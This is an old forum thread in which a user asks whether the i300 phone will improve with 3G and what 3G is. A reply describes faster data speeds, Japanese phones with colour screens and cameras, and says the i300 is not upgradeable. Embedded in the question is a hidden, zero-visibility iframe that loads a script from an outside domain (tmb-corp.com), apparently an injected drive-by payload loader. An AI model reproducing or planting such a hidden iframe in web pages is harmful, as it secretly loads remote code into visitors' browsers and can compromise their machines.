    3g Network

    Will the i300 perform better when the 3g network is rolled out? What exactly is the 3g network??<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

    3G allows faster transmission of data over wireless devices. So, as far as i believe, our 14.4kbps network would be replaced by one that can be "always-on" and could transmit at speeds above 144kbps. Japan is using 3G, and has been for quite a while now. I also understand battery life would be increased, and also, signal strength will be much improved. I was in japan two years ago, and the phones there at THAT time were what we're just getting here now. They already have full color screens on most phones, huge battery life, and many phones now also come with digital cameras built right into the phoen to allow you to take a picture of yourself or something you see, and immediately transfer it (in most cases, in color) to a friend. Really cool stuff. Oh, by the way, the I300 will not be improved by 3G as it is not upgrade-able.
